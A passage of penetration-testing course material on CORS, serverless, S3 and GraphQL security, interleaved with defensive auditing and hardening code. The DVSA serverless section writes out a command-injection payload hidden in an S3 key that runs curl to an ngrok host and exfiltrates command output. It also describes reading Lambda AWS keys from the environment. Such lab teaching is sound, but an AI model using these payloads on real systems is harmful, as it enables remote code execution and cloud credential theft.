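    """Untrusted origins that are reflected back together with credentials=true.
    An ACAO of '*' never qualifies: browsers refuse '*' combined with credentials."""
    found = []
    for origin in PROBES:
        acao, creds = probe(url, origin)
        if origin not in TRUSTED and acao == origin and creds == "true":
            found.append(origin)
    return found


if __name__ == "__main__":
    for reflect in (True, False):
        srv, url = start(reflect)
        print("reflecting" if reflect else "allow-list", "->", exploitable_origins(url))
        srv.shutdown()
```

A reflected "null" is the case the lab below is built around: the attacker does not need a domain at all, a sandboxed iframe on any page sends Origin: null and can read the credentialed response. The fixed handler shows the shape of the remediation: compare the whole origin string against a list, never a substring, and add Vary: Origin so a shared cache does not hand one origin's headers to another.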


Hera Lab

Null Origin Exploitation

There is a sample website that holds a secret token. Your task is to prepare an exploit that takes advantage of the CORS configuration on secret.php and, once opened in another tab, accesses the secret information and sends it to another place, in the same way an XSS can steal a cookie.

*Labs are only available in the Full or Elite Editions of the course.

14.5 Attacking Cloud Based Applications


14.5 Attacking Cloud Based Applications

Companies are transitioning some of their applications to cloud services because these are generally scalable, reliable and highly available. Cloud applications also share some architectural patterns that make them different from traditional web applications.



14.5 Attacking Cloud Based Applications

Different cloud providers have different vulnerabilities or default configurations that can be abused from a penetration testing perspective, offering a whole new attack surface that will be explored in the following sections.



14.5.1 Microservices

Different architectures and their evolution:

Monolithic design: One server holds the web application and the services it needs, such as databases. This offers an easy setup and ease of maintenance at a relatively low price, but introduces several disadvantages. Monolithic designs are difficult to scale and, although maintenance is relatively easy, updating the server can cause downtime, and having a single point of failure can be a disaster if there is no backup plan in place.



14.5.1 Microservices

Tiered monolithic: Services are separated; the web server holds the web application while a different server holds the database or other required services. A tiered monolithic architecture offers the possibility of performing updates without downtime and, if the servers are clustered and load-balanced, performance improves over the previous approach. Tiered monolithic designs are still hard to scale, scaling cannot be automated, and the cluster itself can be a single point of failure that can only be recovered from backups if a disaster occurs.



14.5.1 Microservices

Cloud solutions: Cloud solutions are built on elastic servers or services. This means horizontal scaling can be implemented and fully automated, giving better performance as new instances are created based on the resources needed. Updates can also be performed without downtime, and recovering from a disaster does not involve restoring backups in most cases. Although there are a lot of advantages over the previous designs, there are still problems at the application layer, as it is still one big codebase (monolithic), and costs can be hard to foresee depending on the services needed.



14.5.2 Serverless Applications

Function as a Service (FaaS): Serverless applications are usually code functions running in a cloud environment. This environment and the application stack are managed by the cloud operator. As a result, it has the advantage of avoiding the complexity of building and maintaining the infrastructure typically associated with developing and launching an app.

Serverless applications have some limitations to be aware of: execution time is limited to a few minutes; threads, usable disk space and RAM are also limited; the size of the code package and its dependencies is limited; and a trigger/event is needed to run the function, together with a routing method or API gateway. With these limitations in mind, serverless applications are not the best option for resource-demanding jobs or for tasks that need more than 10 minutes of execution (the exact limit depends on the provider).



14.5.3 Details of Serverless Architecture

Serverless architectures are different from normal web applications, so there are some concepts that must be clear in order to understand them:

API Routing: The routing layer calls the application based on URL association, rules and parameters. It makes the functions reachable from the Internet. In AWS it is called API Gateway.

State: As mentioned before, the lifespan of a function is no more than a few minutes; for this reason there is no durable local storage or cache to rely on, and vulnerabilities like command injection or file upload are exploited in a different way because of this. Anything written to the function's filesystem disappears with the instance, so a persistent foothold has to live in the data stores the function talks to rather than on the host.



14.5.3 Details of Serverless Architecture

Cold Start: As the lifespan is limited, when the code has not been executed in a while, or is run for the first time, it needs to be downloaded, containerized, booted, and primed to run. This can be mitigated using third-party plugins like serverless-plugin-warmup.

Debugging: The benefit of not managing the infrastructure comes with limitations on debugging, due to the lack of direct access to the host and its logs. Instead of attaching a debugger, approaches such as printing variables or running the lambda locally are usually used for debugging applications.

No Ops: Sysadmin tasks are limited, as the environment is managed by the cloud operator. Backups, security monitoring and logging are still necessary.

14.5.3 Details of Serverless Architecture

With microservices and serverless apps there are some changes related to
security. Network security changes drastically, as the security model of
functions does not rely on IP addresses and ports. Instead, they share the same
external IP address and there are no local network restrictions for them inside
the host. Since network restrictions are barely usable, restrictions are applied
through the access controls and permissions provided by the cloud.

14.5.3.1 Serverless Application Example

To understand the concepts explained in the previous slides, we will deploy a
serverless function application in AWS. It is necessary to create an AWS
account for this purpose. Damn Vulnerable Serverless Application (DVSA) from
OWASP is the learning environment to be deployed and used in this example.

Head over to https://aws.amazon.com/lambda to start creating a function.

1. Go to Lambda, Create application
2. Other Options
3. Browse serverless app repository
4. Mark the option "Show apps that create custom IAM roles or resource policies"
5. Search DVSA
Go to AWS Systems Manager, Parameter Store, and look for the DVSA URL.

Now head to the URL and register an account. It should be a real email for
receiving the activation code.

Now the application has been deployed and we will come back to it later.
Remember to delete resources once you finish working with them.

14.5.4 S3 Buckets

Simple Storage Service (S3) is an AWS scalable and distributed file system.
The root folders of these filesystems are referred to as buckets, while
everything else (files, subfolders) is referred to as objects. Misconfigured
S3 buckets have been the principal cause of many information leaks and attacks
against organizations.

For further understanding of the security features inside S3 buckets, head to
your AWS account and let's create a new S3 bucket.

While creating buckets, there are several configuration options that can be
selected in the process.

Access control and encryption can be specified at this stage.

Common S3 attacks consist of unauthorized access to objects. These attacks
often give the capability of modifying and creating new objects and changing
existing policies and permissions on S3 buckets.
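The two places where those permissions live are the bucket policy and the bucket ACL, and both can be reviewed offline once exported (aws s3api get-bucket-policy / get-bucket-acl). The following is an added example, not part of the course material or of any AWS tool: it walks a policy document and an ACL in the shape the API returns and reports every unconditional grant to a public principal. The policy, ACL, bucket name, account id and grantee id are constructed placeholders.

```python
import fnmatch
import json

# Actions that, when granted to everyone, give the capabilities described
# above: reading, creating and changing objects, or rewriting the policy.
SENSITIVE_ACTIONS = {
    "s3:GetObject": "read objects",
    "s3:ListBucket": "list objects",
    "s3:PutObject": "create/overwrite objects",
    "s3:DeleteObject": "delete objects",
    "s3:PutBucketPolicy": "change bucket policy",
    "s3:PutBucketAcl": "change bucket ACL",
}

# ACL grantee groups that mean "everyone" or "every AWS account".
PUBLIC_GRANTEES = {
    "http://acs.amazonaws.com/groups/global/AllUsers": "anyone on the internet",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers": "any AWS account",
}


def _as_list(value):
    # Policy grammar allows a single string where a list is expected.
    return value if isinstance(value, list) else [value]


def _is_public_principal(principal) -> bool:
    # Principal "*" or {"AWS": "*"} means anyone, signed or anonymous.
    if principal == "*":
        return True
    if isinstance(principal, dict):
        return "*" in _as_list(principal.get("AWS", []))
    return False


def find_public_grants(policy_json: str) -> list:
    """Return (Sid, action, risk) for unconditional Allow statements that
    grant a sensitive action to a public principal."""
    policy = json.loads(policy_json)
    findings = []
    for i, stmt in enumerate(_as_list(policy.get("Statement", []))):
        if stmt.get("Effect") != "Allow":
            continue
        if not _is_public_principal(stmt.get("Principal")):
            continue
        if stmt.get("Condition"):
            # A Condition (e.g. aws:SourceVpce) narrows the grant; review it
            # separately rather than flag it as fully public.
            continue
        sid = stmt.get("Sid", "Statement%d" % i)
        for pattern in _as_list(stmt.get("Action", [])):
            for action, risk in SENSITIVE_ACTIONS.items():
                # Actions may be wildcarded ("s3:*", "s3:Put*") and are
                # matched case-insensitively.
                if fnmatch.fnmatchcase(action.lower(), pattern.lower()):
                    findings.append((sid, action, risk))
    return findings


def find_public_acl_grants(acl: dict) -> list:
    """Return (who, permission) for ACL grants to the public grantee groups."""
    findings = []
    for grant in acl.get("Grants", []):
        grantee = grant.get("Grantee", {})
        uri = grantee.get("URI")
        if grantee.get("Type") == "Group" and uri in PUBLIC_GRANTEES:
            findings.append((PUBLIC_GRANTEES[uri], grant.get("Permission")))
    return findings


# Constructed sample policy: one public-read statement, one that lets any
# AWS account write objects and rewrite the policy, one VPC-restricted
# statement and one limited to an admin role.
SAMPLE_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {"Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
         "Action": "s3:GetObject", "Resource": "arn:aws:s3:::example-bucket/*"},
        {"Sid": "AnyoneCanWrite", "Effect": "Allow", "Principal": {"AWS": "*"},
         "Action": ["s3:PutObject", "s3:PutBucketPolicy"],
         "Resource": ["arn:aws:s3:::example-bucket/*", "arn:aws:s3:::example-bucket"]},
        {"Sid": "VpcOnly", "Effect": "Allow", "Principal": "*", "Action": "s3:*",
         "Resource": "arn:aws:s3:::example-bucket/*",
         "Condition": {"StringEquals": {"aws:SourceVpce": "vpce-EXAMPLE"}}},
        {"Sid": "AdminOnly", "Effect": "Allow",
         "Principal": {"AWS": "arn:aws:iam::123456789012:role/Admin"},
         "Action": "s3:*", "Resource": "arn:aws:s3:::example-bucket/*"},
    ],
})

# Constructed sample ACL in the shape returned by get-bucket-acl.
SAMPLE_ACL = {
    "Grants": [
        {"Grantee": {"Type": "CanonicalUser", "ID": "owner-id-EXAMPLE"},
         "Permission": "FULL_CONTROL"},
        {"Grantee": {"Type": "Group",
                     "URI": "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"},
         "Permission": "WRITE"},
    ]
}

if __name__ == "__main__":
    for finding in find_public_grants(SAMPLE_POLICY):
        print("policy:", finding)
    for finding in find_public_acl_grants(SAMPLE_ACL):
        print("acl:", finding)
```

The AuthenticatedUsers group is the case from the first HackerOne report linked later in this section: it is not "public" in the anonymous sense, but any AWS account in the world satisfies it, so it is treated as public here. Statements carrying a Condition are skipped rather than reported, so they still need a manual look.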

14.5.5 Tool: s3recon

Automating the discovery of misconfigured buckets can be done using s3recon.
Instructions on how to clone and install the tool are provided in the GitHub
repository.

pip can be used to install s3recon, although you might notice missing
dependencies during the process and need to install them too.
s3recon needs a wordlist; there is one in the GitHub repository, or a custom
one can be created based on your needs. For now the one from the repository
will be used:

curl -sSfL -o "word-list.txt" "https://raw.githubusercontent.com/clarketm/s3recon/master/data/words.txt"

Running s3recon with the wordlist file can be done with the following command:

s3recon "word-list.txt" -o "results.json" --public

Buckets marked as "public" could give access to restricted content. Objects
could be accessed via the AWS CLI.

s3recon can be integrated with MongoDB for handling large result sets. This
proves useful in bug bounty programs where any asset belonging to the company
is within scope.

Some reports from HackerOne related to S3 misconfigurations can be reviewed in
the following links:
• https://hackerone.com/reports/631529
• https://hackerone.com/reports/507097
• https://hackerone.com/reports/504600
• https://hackerone.com/reports/209223

14.5.6 S3 AWS Signed URLs

AWS signed URLs can be used to give temporary access to objects. Any user
having this URL will be able to download the object for a limited time. They
are commonly used by streaming providers.

Create a private bucket and add some files to it.
When trying to reach any of these URLs, an "AccessDenied" error will appear
because the bucket has been set as private.

Using the AWS CLI, you should be able to access these objects once it has been
configured via the "aws configure" command. Files can be copied using
"aws s3 cp <S3URI> <LOCALPATH>".

14.5.6.1 Creating Signed URLs

Signed URLs can be generated using the boto3 library for Python
(pip install boto3).
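What boto3's generate_presigned_url produces under the hood is a Signature Version 4 query-string signature: the URL carries the access key id, a timestamp, a validity in seconds and an HMAC over a canonical form of the request, and S3 recomputes that HMAC with the secret key when the URL is used. The following is an added example, not the course's code and not boto3's, that builds such a URL with the standard library only so the pieces can be inspected, and that reads the expiry back out of any presigned URL, which is the check a reviewer wants when a link is meant to be short-lived. The bucket, key and credentials are constructed placeholders.

```python
import datetime as dt
import hashlib
import hmac
import urllib.parse

MAX_EXPIRES = 604800  # seven days, the longest validity SigV4 presigned URLs allow

# Fixed timestamp used by the stand-alone run so the output is reproducible.
SAMPLE_TIME = dt.datetime(2013, 5, 24, 0, 0, 0, tzinfo=dt.timezone.utc)


def _uri_encode(value: str, encode_slash: bool = True) -> str:
    # SigV4 uses RFC 3986 encoding: only A-Z a-z 0-9 - _ . ~ stay literal.
    return urllib.parse.quote(value, safe="-_.~" if encode_slash else "-_.~/")


def _hmac_sha256(key: bytes, msg: str) -> bytes:
    return hmac.new(key, msg.encode("utf-8"), hashlib.sha256).digest()


def _signing_key(secret_key: str, date_stamp: str, region: str) -> bytes:
    # kSigning = HMAC(HMAC(HMAC(HMAC("AWS4"+secret, date), region), "s3"), "aws4_request")
    k_date = _hmac_sha256(("AWS4" + secret_key).encode("utf-8"), date_stamp)
    k_region = _hmac_sha256(k_date, region)
    k_service = _hmac_sha256(k_region, "s3")
    return _hmac_sha256(k_service, "aws4_request")


def generate_presigned_get(bucket, key, access_key, secret_key, region,
                           expires_in, now=None):
    """Return a presigned GET URL for s3://bucket/key valid for expires_in seconds."""
    if not 1 <= expires_in <= MAX_EXPIRES:
        raise ValueError("expires_in must be between 1 and %d seconds" % MAX_EXPIRES)
    now = now or dt.datetime.now(dt.timezone.utc)
    host = "%s.s3.amazonaws.com" % bucket
    amz_date = now.strftime("%Y%m%dT%H%M%SZ")
    date_stamp = now.strftime("%Y%m%d")
    scope = "%s/%s/s3/aws4_request" % (date_stamp, region)
    params = {
        "X-Amz-Algorithm": "AWS4-HMAC-SHA256",
        "X-Amz-Credential": "%s/%s" % (access_key, scope),
        "X-Amz-Date": amz_date,
        "X-Amz-Expires": str(expires_in),
        "X-Amz-SignedHeaders": "host",
    }
    # Canonical query string: keys sorted, keys and values RFC 3986 encoded.
    canonical_query = "&".join(
        "%s=%s" % (_uri_encode(k), _uri_encode(v)) for k, v in sorted(params.items()))
    canonical_uri = "/" + _uri_encode(key, encode_slash=False)
    canonical_request = "\n".join([
        "GET",
        canonical_uri,
        canonical_query,
        "host:%s\n" % host,   # canonical headers block, terminated by a blank line
        "host",               # signed headers
        "UNSIGNED-PAYLOAD",   # presigned URLs do not hash the body
    ])
    string_to_sign = "\n".join([
        "AWS4-HMAC-SHA256",
        amz_date,
        scope,
        hashlib.sha256(canonical_request.encode("utf-8")).hexdigest(),
    ])
    signature = hmac.new(_signing_key(secret_key, date_stamp, region),
                         string_to_sign.encode("utf-8"), hashlib.sha256).hexdigest()
    return "https://%s%s?%s&X-Amz-Signature=%s" % (host, canonical_uri,
                                                  canonical_query, signature)


def presigned_url_expiry(url: str) -> dt.datetime:
    """When a presigned URL stops working, from its X-Amz-Date and X-Amz-Expires."""
    query = urllib.parse.parse_qs(urllib.parse.urlsplit(url).query)
    issued = dt.datetime.strptime(query["X-Amz-Date"][0], "%Y%m%dT%H%M%SZ")
    issued = issued.replace(tzinfo=dt.timezone.utc)
    return issued + dt.timedelta(seconds=int(query["X-Amz-Expires"][0]))


def presigned_url_remaining_seconds(url: str, now: dt.datetime) -> int:
    """Seconds of validity left at the given time (negative once expired)."""
    return int((presigned_url_expiry(url) - now).total_seconds())


if __name__ == "__main__":
    # Constructed placeholder credentials; never embed real keys in code.
    url = generate_presigned_get("example-bucket", "videos/episode 1.mp4",
                                 "AKIAEXAMPLE", "EXAMPLESECRET", "us-east-1",
                                 3600, SAMPLE_TIME)
    print(url)
    print("expires at", presigned_url_expiry(url))
```

Two things worth noticing from a review standpoint: the signature covers only the host header and the query string, so anyone holding the URL can use it from anywhere until X-Amz-Expires runs out, and the expiry is readable in clear from the URL itself, so log scrubbing and a short validity are the only real controls. AWS's own SigV4 query-parameter documentation walks through the same canonical request with the sample credentials the test below uses, if you want to compare the intermediate strings.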

Visiting the signed URL shows the object contents.

14.5.6.2 Signed Cookies

Signed URLs give access to a single file. This method does not scale when
access to a set of objects is needed. For this reason, signed cookies can be
used to give access to more than one object at a time.

14.5.7 Serverless Event Injection

Serverless functions listen for events or triggers in order to be executed.
These events can be injected from other trusted sources in cloud environments,
leading to a Serverless Event Injection vulnerability. These trusted sources
can be:
• Actions on S3 objects
• Alerting systems (CloudWatch)
• API Gateway calls
• Changes in the code repository
• Database events
• HTTP APIs
Some serverless functions run shell or eval content with untrusted input. For
instance, imagine a function like the previous example where the S3 URIs are
user controlled:

os.system("aws s3 cp {0} {1}".format(src_object, dst_object))

If we are able to control any of these variables, a command injection
vulnerability arises simply by changing the filename.
14.5.7.1 Serverless Event Injection Scenario

Remember that serverless functions live for a limited time. This is because
they are executed in a small server that lives for a few minutes; this means
regular vulnerabilities can exist, but only for the time the server is alive.

Visit https://www.serverless-hack.me/ or install it in your AWS account.
The application converts Word doc files to text. It takes a URL (a default one
is supplied) and outputs its contents on the screen.

The function gets invoked by an AWS API Gateway call. We can observe how the
command is issued by crashing the application.

Observing the API Gateway configuration, we can see that this endpoint works as
a Lambda proxy: when the serverless function receives the event from the proxy,
it gets invoked.

As we have seen the vulnerable code and where the injection takes place, try
injecting some commands.

HINT: use "> /dev/null" after the document URL to receive a clean output.

As the server will be recycled due to its limited life, there is no point in
trying to backdoor it. However, lambda functions store AWS keys in environment
variables. They could be reached using "env" or "cat /proc/self/environ".
14.5.7.2 Serverless Event Injection Scenario 2

Let's go back to the Damn Vulnerable Serverless Application installed before,
in order to discover more events that can be injected.

Visit the URL and add some elements to the cart.

Enter random details in the shipping information and submit them in order to
receive the receipt.

If you take a look at the message of the order, it will contain an S3 bucket
with a UUID for the order receipt.

It seems the receipt is being copied from an S3 bucket folder generated using
the receipt's date and UUID. This bucket's permissions are relatively open, as
uploading files is allowed via:

echo "blah" > file.txt && aws s3 cp file.txt 's3://<BUCKET>/2020/20/20/whatever' --acl public-read

It has been confirmed that the S3 bucket is open for read/write to everyone.
Let's check the code in
https://github.com/OWASP/DVSA/blob/master/backend/src/functions/processing/send_receipt_email.py

The event handler reads the bucket name, key and order, then the function
replaces the extension ".raw" with ".txt", meaning it expects a raw S3 object.
Then a download path is created and recorded into a log file using "os.system".
As in the previous example, the application passes to the os.system function
some content that we can control, as the S3 bucket permissions are weak.
Following the naming convention that the function expects, an OS command
injection payload can be uploaded and executed using the S3 AWS API.
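Both scenarios in this section (the "aws s3 cp {0} {1}" string earlier and the receipt handler here) share one root cause: an object name taken from the event is pasted into a string that a shell parses. The following is an added example, not DVSA's code and not the course's, showing the vulnerable construction beside the hardened form a reviewer would ask for: validate the bucket and key against an allowlist that encodes the naming convention the function already expects, and hand the arguments to subprocess as a list so no shell ever sees them. The event, bucket name and key pattern are constructed; the exact character allowlist is this example's choice.

```python
import re
import subprocess
import urllib.parse

# Receipt objects are expected as <yyyy>/<mm>/<dd>/<name>.raw and the function
# writes <name>.txt next to them. The date/uuid layout comes from the DVSA
# description above; the exact character allowlist is this example's choice.
SAFE_BUCKET = re.compile(r"[a-z0-9][a-z0-9.-]{1,61}[a-z0-9]")
SAFE_KEY = re.compile(r"\d{4}/\d{2}/\d{2}/[A-Za-z0-9_-]+\.(raw|txt)")


def vulnerable_command(src_object: str, dst_object: str) -> str:
    """The construction shown on the slide: one string handed to a shell by
    os.system, so any metacharacter in an object name becomes shell syntax."""
    return "aws s3 cp {0} {1}".format(src_object, dst_object)


def validate_s3_uri(uri: str) -> str:
    """Accept only s3://<bucket>/<yyyy>/<mm>/<dd>/<name>.raw|.txt, else raise."""
    if not uri.startswith("s3://"):
        raise ValueError("not an S3 URI: %r" % uri)
    bucket, _, key = uri[len("s3://"):].partition("/")
    if not SAFE_BUCKET.fullmatch(bucket):
        raise ValueError("bucket name outside allowlist: %r" % bucket)
    if not SAFE_KEY.fullmatch(key):
        raise ValueError("object key does not follow the receipt naming convention: %r" % key)
    return uri


def is_valid_s3_uri(uri: str) -> bool:
    try:
        validate_s3_uri(uri)
        return True
    except ValueError:
        return False


def safe_copy_argv(src_object: str, dst_object: str) -> list:
    """argv for subprocess with shell=False: arguments are never parsed by a
    shell, and both URIs have passed the allowlist first."""
    return ["aws", "s3", "cp", validate_s3_uri(src_object), validate_s3_uri(dst_object)]


def run_copy(src_object: str, dst_object: str) -> None:
    # shell=False is the default; stated explicitly to make the intent obvious.
    subprocess.run(safe_copy_argv(src_object, dst_object), shell=False, check=True)


def handler(event, context=None):
    """Minimal S3-event handler (constructed) showing where the validation sits."""
    record = event["Records"][0]["s3"]
    # S3 URL-encodes the key inside the event; decode before validating so the
    # check runs on the real object name.
    key = urllib.parse.unquote_plus(record["object"]["key"])
    src = "s3://%s/%s" % (record["bucket"]["name"], key)
    if not src.endswith(".raw"):
        return {"skipped": src}
    dst = src[:-len(".raw")] + ".txt"
    return {"argv": safe_copy_argv(src, dst)}


# Constructed S3 event, in the shape Lambda receives for an ObjectCreated trigger.
SAMPLE_EVENT = {"Records": [{"s3": {"bucket": {"name": "receipts-bucket"},
                                    "object": {"key": "2020/01/31/abc-123.raw"}}}]}

# Constructed object name in the style the page discusses: the `;` would split
# the os.system string into several commands.
TAMPERED_KEY = "s3://receipts-bucket/2020/20/20/whatever_;id;echo x.raw"

if __name__ == "__main__":
    print("shell string:", vulnerable_command(TAMPERED_KEY, "out.txt"))
    print("hardened:", handler(SAMPLE_EVENT))
    print("tampered key accepted:", is_valid_s3_uri(TAMPERED_KEY))
```

The argv form alone removes the shell, but the allowlist still matters: the AWS CLI interprets its own arguments, and a key that is a valid S3 name yet points somewhere unexpected is a logic problem that shell=False does not address. The handler returns the argv rather than running it so the example can be executed without the CLI installed; run_copy is the call site in a real function.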
Ngrok will be used to expose local ports to the internet and catch a reverse
shell for this exercise. Visit the website https://ngrok.com and register an
account.

After the account has been created, download the ngrok client for your OS and
authorize it following the instructions under "connect your account".

Once the account has been set up you can expose a local port to the internet
by running "ngrok http 80" and taking note of the URL.

Requests received on port 80 can be checked on the local web interface
http://127.0.0.1:4040.

Now, using the same naming convention as the function expects, a payload can
be crafted to achieve RCE and receive the response back on our exposed
interface.

Payload: aws s3 cp empty.txt 's3://<your_bucket_id>/2020/20/20/whatever_;curl XXX.ngrok.io?data="$(whoami)";echo x.raw' --acl public-read

• whatever_; -> the function checks for an underscore in the file name
• curl something.ngrok.io -> the ngrok endpoint to send the output to
• "$(whoami)"; -> the command to run
• echo x.raw -> the key needs to end in .raw to be triggered
With everything in place, go and check the ngrok web interface to confirm that
there are some requests. Commands that return a multiline response will not go
through, as they will break the payload. However, their output can be base64
encoded without line breaks using "$(ls -lha | base64 -w0)" in the payload.

Ngrok will now receive the requests, which can be decoded to get the command
output.

If you output the result of the env command, it will include the AWS keys used
by the lambda functions. As a result, they will carry the same privileges the
function has been given when used with the API.

At this point the DVSA stack can be deleted from the CloudFormation AWS
service, along with the S3 buckets.

14.5.8 GraphQL APIs

GRAPHQL
• GraphQL is a different type of API interface where there is one endpoint to
  an API (instead of many endpoints in REST), and two types of operations
  (Query and Mutation) instead of the 5 or so in REST (GET, PUT, POST, PATCH,
  DELETE).
• Usually example.com/graphql or something similar (a nice idea for Google
  dorks).
• REST usually has one endpoint for each type of object (users, groups, items,
  books, orders, shipments, etc.) with 3 or more operations on each endpoint.
• In GraphQL, the same endpoint serves all predefined objects under both Query
  and Mutation methods.
GRAPHQL TERMS
• Query: a read operation on an object or type.
• Mutate: an update operation on an object, like creating a new one, updating
  it fully, updating it partially, or deleting it.
• Type (object type): a type of object, like a class or table, e.g. Users,
  Orders, Books.

MORE GRAPHQL TERMS
• Schema: describes the types, fields and actions available.
• Introspection: a method to learn more about the schema details, like types
  and fields.
• Resolver: a function that connects schema definitions to actual backend data
  sources, like SQL tables.
• Scalar Type: the type of data for a field, like string, int or custom types.
Sample GraphQL query:

• GraphQL can also be called from the command line using curl:
  • using POST
  • Content-Type is JSON
  • output is sent to jq for pretty JSON

Calling a particular object in GraphQL:

GraphQL nested queries:
• Display each user with his group subscriptions using GraphQL, showing the id
  and name of the group
• Hint: groups {id name}
• Try both GraphiQL and curl

Security in GraphQL
• GraphQL has no built-in understanding of security. It will return the object
  as it was requested.
• Without explicit filtering, sensitive data could be exposed and extracted.
• Can we read sensitive user info such as passwords?

Making updates in GraphQL:
• In GraphQL, updates (addition, creation, deletion) are called mutations.
• Let's check the source code
• We have 3 mutations

deleteUser mutation
• The deleteUser mutation can be called by:
  • defining the operation type to be a mutation
  • selecting the named deleteUser mutation
  • supplying the id to be deleted, and a sub-selection for the response (the
    ok field here)
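The nested query, the deleteUser mutation and the introspection question ("can we read passwords?") all come down to the same POST body, so they fit in one script. The following is an added example, not DVSA's code and not the course's: it builds the request bodies the curl slides send, and runs an offline review over an introspection result to list every type that exposes a sensitive-looking field and every mutation the schema offers. The endpoint, the schema and the createUser/updateUser names are constructed; only deleteUser and the groups {id name} selection come from the slides.

```python
import json
import urllib.request

# Nested query: each user with the id and name of the groups they belong to.
USERS_WITH_GROUPS_QUERY = """
query {
  users {
    id
    username
    groups { id name }
  }
}
"""

# The deleteUser mutation with its argument passed as a variable; the
# sub-selection asks for the ok field of the response.
DELETE_USER_MUTATION = """
mutation DeleteUser($id: ID!) {
  deleteUser(id: $id) { ok }
}
"""

# Trimmed introspection query: enough to list every type and its field names.
INTROSPECTION_QUERY = "{ __schema { types { name fields { name } } } }"

# Field names that should not be selectable through the API at all.
SENSITIVE_FIELD_NAMES = {"password", "passwordhash", "secret", "token", "apikey", "ssn"}


def build_request(query: str, variables=None) -> dict:
    """Body for POST /graphql (Content-Type: application/json)."""
    body = {"query": query}
    if variables:
        body["variables"] = variables
    return body


def post_graphql(endpoint: str, query: str, variables=None, timeout=10) -> dict:
    """Send the request the way the curl slides do (needs a live endpoint)."""
    data = json.dumps(build_request(query, variables)).encode("utf-8")
    req = urllib.request.Request(endpoint, data=data,
                                 headers={"Content-Type": "application/json"})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return json.load(resp)


def find_sensitive_fields(introspection: dict) -> list:
    """'Type.field' for every user-defined object type exposing a sensitive field."""
    hits = []
    for t in introspection["data"]["__schema"]["types"]:
        if t["name"].startswith("__") or not t.get("fields"):
            continue  # built-in introspection types and scalars have nothing to check
        for f in t["fields"]:
            if f["name"].lower().replace("_", "") in SENSITIVE_FIELD_NAMES:
                hits.append("%s.%s" % (t["name"], f["name"]))
    return hits


def list_mutations(introspection: dict) -> list:
    """Names of the fields on the Mutation type (the write operations)."""
    for t in introspection["data"]["__schema"]["types"]:
        if t["name"] == "Mutation":
            return [f["name"] for f in t.get("fields") or []]
    return []


# Constructed introspection response for a small user/group schema (not DVSA's).
SAMPLE_INTROSPECTION = {"data": {"__schema": {"types": [
    {"name": "Query", "fields": [{"name": "users"}, {"name": "user"}, {"name": "groups"}]},
    {"name": "User", "fields": [{"name": "id"}, {"name": "username"},
                                {"name": "password"}, {"name": "groups"}]},
    {"name": "Group", "fields": [{"name": "id"}, {"name": "name"}, {"name": "members"}]},
    {"name": "Mutation", "fields": [{"name": "createUser"}, {"name": "updateUser"},
                                    {"name": "deleteUser"}]},
    {"name": "__Schema", "fields": [{"name": "types"}]},
    {"name": "String", "fields": None},
    {"name": "ID", "fields": None},
]}}}

if __name__ == "__main__":
    print(json.dumps(build_request(DELETE_USER_MUTATION, {"id": "4"})))
    print("exposed:", find_sensitive_fields(SAMPLE_INTROSPECTION))
    print("mutations:", list_mutations(SAMPLE_INTROSPECTION))
```

A User.password hit in the introspection output is exactly the "no built-in understanding of security" point from the previous slide: the field is selectable because the schema declares it, and the fix is to leave it out of the type (or out of the resolver's returned data), not to hope clients do not ask for it. Disabling introspection in production hides the listing but not the field.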

14.5.9 Function as a Service

Function as a Service (FaaS) is a modern (as of the beginning of 2020) type
of software architecture. It is implemented in most common cloud providers,
like AWS Lambda, Google Cloud Functions, IBM OpenWhisk or Microsoft Azure
Functions.

The FaaS model allows us to execute code in response to events without
maintaining any infrastructure for it (apart from the cloud account). It
allows the user to simply upload modular fragments of functionality into the
cloud, and they are executed independently.
Such a solution allows for better scalability, and is the next level of
splitting a monolithic application into functional pieces.


14.5.9 Function as a Service

A sample „Hello World” in FaaS (written in Node.js) can look


like below.
/**
* @param {Object} req Cloud Function request context.
* @param {Object} res Cloud Function response context.
*/
exports.helloHttp = function helloHttp (req, res) {
res.send(`Hello ${req.body.name || 'World'}!`);
};

Despite being a function, keep in mind that any online service exchanges and
processes data or does some sort of authentication. This is exactly as subject
to abuse as any other web or cloud application!

You can experiment more with serverless software by downloading and playing
with DVFaaS:
https://github.com/we45/DVFaaS-Damn-Vulnerable-Functions-as-a-Service
Each subdirectory of the project contains detailed steps to follow in order to
deploy as well as exploit a vulnerable instance.

We encourage you to explore the API and Cloud area, as there are definitely
lots of vulnerabilities to discover in the field of Cloud security!

References

Cross Origin Resource Sharing
https://www.w3.org/TR/cors/

Calculator Web Service
http://www.dneonline.com/calculator.asmx

Calculator webservice – add
http://www.dneonline.com/calculator.asmx?op=Add

Sample calculator webservice WSDL file
http://www.dneonline.com/calculator.asmx?wsdl

Web Application Description Language
https://www.w3.org/Submission/wadl/

Swagger UI
https://swagger.io/tools/swagger-ui/

Swagger
https://swagger.io/

Web Services Description Language (WSDL) 1.1
https://www.w3.org/TR/wsdl.html

Latest SOAP versions
https://www.w3.org/TR/soap/

Latest Release of SoapUI
https://www.soapui.org/downloads/latest-release.html

Running Adhoc Commands
https://docs.rundeck.com/docs/api/rundeck-api.html#adhoc

AWS – Getting shell access
https://blog.appsecco.com/getting-shell-and-data-access-in-aws-by-chaining-vulnerabilities-7630fa57c7ed

EC2 after IMDSv2
https://blog.appsecco.com/server-side-request-forgery-ssrf-and-aws-ec2-instances-after-instance-meta-data-service-version-38fc1ba1a28a

Function as a Service
https://medium.com/@BoweiHan/an-introduction-to-serverless-and-faas-functions-as-a-service-fb5cec0417b2

Damn Vulnerable Function as a Service
https://github.com/we45/DVFaaS-Damn-Vulnerable-Functions-as-a-Service

clarketm/s3recon
https://github.com/clarketm/s3recon

Listing of Amazon S3 Bucket accessible to any amazon authenticated user (vector-maps-e457472599)
https://hackerone.com/reports/631529

Open AWS S3 bucket leaks all Images uploaded to Zomato chat
https://hackerone.com/reports/507097

Open S3 Bucket WriteAble To Any Aws User
https://hackerone.com/reports/209223

Open s3 bucket allows for public upload
https://hackerone.com/reports/504600

serverless-plugin-warmup
http://github.com/Fidellimited/serverless-plugin-warmup

DVSA
https://github.com/OWASP/DVSA

AWS Lambda
https://aws.amazon.com/lambda

OWASP ServerlessGoat
https://www.serverless-hack.me/

DVSA send_receipt_email.py
https://github.com/OWASP/DVSA/blob/master/backend/src/functions/processing/send_receipt_email.py

Ngrok
https://ngrok.com/


Labs
Null Origin Exploitation
There is a sample website that holds a secret token. Your task is to
